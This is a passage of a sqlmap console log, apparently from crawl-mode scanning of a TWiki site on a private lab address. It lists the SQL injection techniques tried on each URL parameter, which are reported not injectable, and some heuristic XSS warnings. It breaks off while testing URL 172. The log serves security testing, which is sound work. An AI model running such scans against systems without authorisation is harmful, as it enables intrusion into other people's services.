[20:06:48] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 165:
GET http://192.168.1.113:80/twiki/bin/rdiff/Know/WebPreferences?rev1=1.12&rev2=1.11
do you want to test this URL? [Y/n/q]
> Y
[20:06:48] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebPreferences?rev1=1.12&rev2=1.11'
[20:06:48] [INFO] testing connection to the target URL
[20:06:48] [INFO] testing if the target URL is stable
[20:06:49] [INFO] target URL is stable
[20:06:49] [INFO] testing if GET parameter 'rev1' is dynamic
[20:06:49] [WARNING] GET parameter 'rev1' does not appear dynamic
[20:06:49] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[20:06:49] [INFO] testing for SQL injection on GET parameter 'rev1'
[20:06:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:06:50] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:06:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:06:51] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:06:51] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:06:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:06:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:06:53] [INFO] testing 'MySQL inline queries'
[20:06:53] [INFO] testing 'PostgreSQL inline queries'
[20:06:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:06:53] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:06:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:06:54] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:06:54] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:06:55] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:06:55] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:06:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:06:56] [INFO] testing 'Oracle AND time-based blind'
[20:06:57] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:06:57] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:07:03] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:07:09] [WARNING] GET parameter 'rev1' is not injectable
[20:07:09] [INFO] testing if GET parameter 'rev2' is dynamic
[20:07:09] [WARNING] GET parameter 'rev2' does not appear dynamic
[20:07:09] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[20:07:09] [INFO] testing for SQL injection on GET parameter 'rev2'
[20:07:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:07:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:07:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:07:11] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:07:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:07:12] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:07:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:07:13] [INFO] testing 'MySQL inline queries'
[20:07:13] [INFO] testing 'PostgreSQL inline queries'
[20:07:13] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:07:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:07:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:07:14] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:07:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:07:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:07:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:07:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:07:17] [INFO] testing 'Oracle AND time-based blind'
[20:07:17] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:07:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:07:30] [WARNING] GET parameter 'rev2' is not injectable
[20:07:30] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 166:
GET http://192.168.1.113:80/twiki/bin/view/Know/WebPreferences?rev=1.11
do you want to test this URL? [Y/n/q]
> Y
[20:07:30] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Know/WebPreferences?rev=1.11'
[20:07:30] [INFO] testing connection to the target URL
[20:07:30] [INFO] testing if the target URL is stable
[20:07:31] [INFO] target URL is stable
[20:07:31] [INFO] testing if GET parameter 'rev' is dynamic
[20:07:31] [WARNING] GET parameter 'rev' does not appear dynamic
[20:07:31] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[20:07:31] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[20:07:31] [INFO] testing for SQL injection on GET parameter 'rev'
[20:07:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:07:32] [WARNING] reflective value(s) found and filtering out
[20:07:33] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:07:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:07:34] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:07:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:07:35] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:07:35] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:07:35] [INFO] testing 'MySQL inline queries'
[20:07:36] [INFO] testing 'PostgreSQL inline queries'
[20:07:36] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:07:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:07:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:07:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:07:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:07:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:07:38] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:07:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:07:39] [INFO] testing 'Oracle AND time-based blind'
[20:07:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:07:40] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:07:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:07:52] [WARNING] GET parameter 'rev' is not injectable
[20:07:52] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[20:07:52] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Know/WebPreferences?rev1=1.11&rev2=1.10'
[20:07:52] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Know/WebPreferences?rev=1.10'
URL 167:
GET http://192.168.1.113:80/twiki/bin/oops/Know/WebPreferences?template=oopsmore&param1=1.12&param2=1.12
do you want to test this URL? [Y/n/q]
> Y
[20:07:52] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Know/WebPreferences?template=oopsmore&param1=1.12&param2=1.12'
[20:07:52] [INFO] testing connection to the target URL
[20:07:53] [INFO] testing if the target URL is stable
[20:07:53] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[20:07:53] [INFO] testing if GET parameter 'template' is dynamic
[20:07:53] [INFO] confirming that GET parameter 'template' is dynamic
[20:07:54] [INFO] GET parameter 'template' is dynamic
[20:07:54] [INFO] heuristics detected web page charset 'ascii'
[20:07:54] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[20:07:54] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[20:07:54] [INFO] testing for SQL injection on GET parameter 'template'
[20:07:54] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:07:54] [WARNING] reflective value(s) found and filtering out
[20:07:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:07:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:07:55] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:07:56] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:07:56] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:07:57] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:07:57] [INFO] testing 'MySQL inline queries'
[20:07:57] [INFO] testing 'PostgreSQL inline queries'
[20:07:57] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:07:57] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:07:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:07:58] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:07:58] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:07:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:07:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:07:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:08:00] [INFO] testing 'Oracle AND time-based blind'
[20:08:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:08:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:08:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:08:09] [WARNING] GET parameter 'template' is not injectable
[20:08:09] [INFO] testing if GET parameter 'param1' is dynamic
[20:08:09] [WARNING] GET parameter 'param1' does not appear dynamic
[20:08:10] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[20:08:10] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks
[20:08:10] [INFO] testing for SQL injection on GET parameter 'param1'
[20:08:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:08:11] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:08:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:08:12] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:08:12] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:08:13] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:08:13] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:08:13] [INFO] testing 'MySQL inline queries'
[20:08:13] [INFO] testing 'PostgreSQL inline queries'
[20:08:14] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:08:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:08:14] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:08:15] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:08:15] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:08:15] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:08:16] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:08:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:08:17] [INFO] testing 'Oracle AND time-based blind'
[20:08:18] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:08:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:08:30] [WARNING] GET parameter 'param1' is not injectable
[20:08:30] [INFO] testing if GET parameter 'param2' is dynamic
[20:08:30] [WARNING] GET parameter 'param2' does not appear dynamic
[20:08:30] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable
[20:08:30] [INFO] testing for SQL injection on GET parameter 'param2'
[20:08:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:08:32] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:08:32] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:08:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:08:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:08:34] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:08:34] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:08:34] [INFO] testing 'MySQL inline queries'
[20:08:34] [INFO] testing 'PostgreSQL inline queries'
[20:08:34] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:08:35] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:08:35] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:08:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:08:36] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:08:36] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:08:37] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:08:37] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:08:38] [INFO] testing 'Oracle AND time-based blind'
[20:08:38] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:08:45] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:08:51] [WARNING] GET parameter 'param2' is not injectable
[20:08:51] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 168:
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/WebHome?t=1441457699
do you want to test this URL? [Y/n/q]
> Y
[20:08:51] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/WebHome?t=1441457699'
[20:08:51] [INFO] testing connection to the target URL
[20:08:51] [INFO] testing if the target URL is stable
[20:08:52] [INFO] target URL is stable
[20:08:52] [INFO] testing if GET parameter 't' is dynamic
[20:08:52] [WARNING] GET parameter 't' does not appear dynamic
[20:08:52] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[20:08:52] [INFO] testing for SQL injection on GET parameter 't'
[20:08:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:08:53] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:08:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:08:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:08:55] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:08:55] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:08:56] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:08:56] [INFO] testing 'MySQL inline queries'
[20:08:56] [INFO] testing 'PostgreSQL inline queries'
[20:08:56] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:08:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:08:57] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:08:57] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:08:57] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:08:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:08:58] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:08:59] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:08:59] [INFO] testing 'Oracle AND time-based blind'
[20:09:00] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:09:00] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:09:06] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:09:12] [WARNING] GET parameter 't' is not injectable
[20:09:12] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 169:
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Web *Home[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[20:09:12] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text&regex=on&search=Web *Home[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[20:09:12] [INFO] testing connection to the target URL
[20:09:12] [INFO] testing if the target URL is stable
[20:09:13] [INFO] target URL is stable
[20:09:13] [INFO] testing if URI parameter '#1*' is dynamic
[20:09:13] [INFO] confirming that URI parameter '#1*' is dynamic
[20:09:13] [INFO] URI parameter '#1*' is dynamic
[20:09:13] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[20:09:14] [INFO] testing for SQL injection on URI parameter '#1*'
[20:09:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:09:14] [WARNING] reflective value(s) found and filtering out
[20:09:15] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:09:16] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:09:16] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:09:17] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:09:17] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:09:18] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:09:18] [INFO] testing 'MySQL inline queries'
[20:09:18] [INFO] testing 'PostgreSQL inline queries'
[20:09:18] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:09:18] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:09:19] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:09:19] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:09:20] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:09:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:09:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:09:21] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:09:22] [INFO] testing 'Oracle AND time-based blind'
[20:09:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:09:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:09:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:09:33] [WARNING] URI parameter '#1*' is not injectable
[20:09:33] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 170:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebHome?skin=print
do you want to test this URL? [Y/n/q]
> Y
[20:09:33] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebHome?skin=print'
[20:09:33] [INFO] testing connection to the target URL
[20:09:33] [INFO] testing if the target URL is stable
[20:09:34] [INFO] target URL is stable
[20:09:34] [INFO] testing if GET parameter 'skin' is dynamic
[20:09:34] [INFO] confirming that GET parameter 'skin' is dynamic
[20:09:34] [INFO] GET parameter 'skin' is dynamic
[20:09:34] [INFO] heuristics detected web page charset 'ascii'
[20:09:34] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[20:09:35] [INFO] testing for SQL injection on GET parameter 'skin'
[20:09:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:09:35] [WARNING] reflective value(s) found and filtering out
[20:09:36] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:09:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:09:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:09:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:09:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:09:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:09:40] [INFO] testing 'MySQL inline queries'
[20:09:40] [INFO] testing 'PostgreSQL inline queries'
[20:09:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:09:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:09:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:09:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:09:42] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:09:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:09:43] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:09:44] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:09:44] [INFO] testing 'Oracle AND time-based blind'
[20:09:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:09:45] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:09:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:10:01] [WARNING] GET parameter 'skin' is not injectable
[20:10:01] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 171:
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebHome?rev1=1.79&rev2=1.78
do you want to test this URL? [Y/n/q]
> Y
[20:10:01] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/WebHome?rev1=1.79&rev2=1.78'
[20:10:01] [INFO] testing connection to the target URL
[20:10:01] [INFO] testing if the target URL is stable
[20:10:02] [INFO] target URL is stable
[20:10:02] [INFO] testing if GET parameter 'rev1' is dynamic
[20:10:02] [WARNING] GET parameter 'rev1' does not appear dynamic
[20:10:02] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[20:10:02] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks
[20:10:02] [INFO] testing for SQL injection on GET parameter 'rev1'
[20:10:03] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:10:03] [WARNING] reflective value(s) found and filtering out
[20:10:04] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:10:04] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:10:05] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:10:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:10:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:10:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:10:06] [INFO] testing 'MySQL inline queries'
[20:10:06] [INFO] testing 'PostgreSQL inline queries'
[20:10:07] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:10:07] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:10:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:10:08] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:10:08] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:10:08] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:10:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:10:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:10:10] [INFO] testing 'Oracle AND time-based blind'
[20:10:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:10:11] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[20:10:17] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:10:23] [WARNING] GET parameter 'rev1' is not injectable
[20:10:23] [INFO] testing if GET parameter 'rev2' is dynamic
[20:10:23] [INFO] confirming that GET parameter 'rev2' is dynamic
[20:10:23] [INFO] GET parameter 'rev2' is dynamic
[20:10:24] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[20:10:24] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks
[20:10:24] [INFO] testing for SQL injection on GET parameter 'rev2'
[20:10:24] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:10:25] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[20:10:28] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[20:10:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[20:10:29] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:10:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[20:10:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[20:10:32] [INFO] testing 'MySQL inline queries'
[20:10:33] [INFO] testing 'PostgreSQL inline queries'
[20:10:35] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:10:36] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[20:10:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[20:10:37] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:10:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[20:10:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[20:10:39] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[20:10:39] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:10:40] [INFO] testing 'Oracle AND time-based blind'
[20:10:40] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[20:10:47] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[20:10:53] [WARNING] GET parameter 'rev2' is not injectable
[20:10:53] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 172:
GET http://192.168.1.113:80/twiki/bin/view/TWiki/WebHome?rev=1.78
do you want to test this URL? [Y/n/q]
> Y
[20:10:53] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/WebHome?rev=1.78'
[20:10:53] [INFO] testing connection to the target URL
[20:10:54] [INFO] testing if the target URL is stable
[20:10:54] [INFO] target URL is stable
